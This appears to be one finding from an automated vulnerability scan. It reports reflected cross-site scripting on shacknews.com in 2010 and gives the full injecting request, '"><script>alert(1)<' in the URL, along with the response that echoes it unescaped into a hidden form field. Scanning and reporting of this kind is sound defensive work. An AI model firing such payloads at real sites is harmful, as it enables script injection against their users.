1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.shacknews.com |
Path: | / |
GET /?d710b"><script>alert(1)< Host: www.shacknews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:38:42 GMT Server: Apache X-Powered-By: PHP/5.2.10 Expires: Sun, 20 Dec 1998 01:00:00 GMT Last-Modified: Sun, 21 Nov 2010 21:38:42 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: SHACKID=balancer.10.1.1 Set-Cookie: shackon=anon%40174.121 Set-Cookie: shackon=anon%40174.121 Connection: close Content-Length: 144783 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> ...[SNIP]... <input type="hidden" name="uri" value="/?d710b"><script>alert(1)< ...[SNIP]... |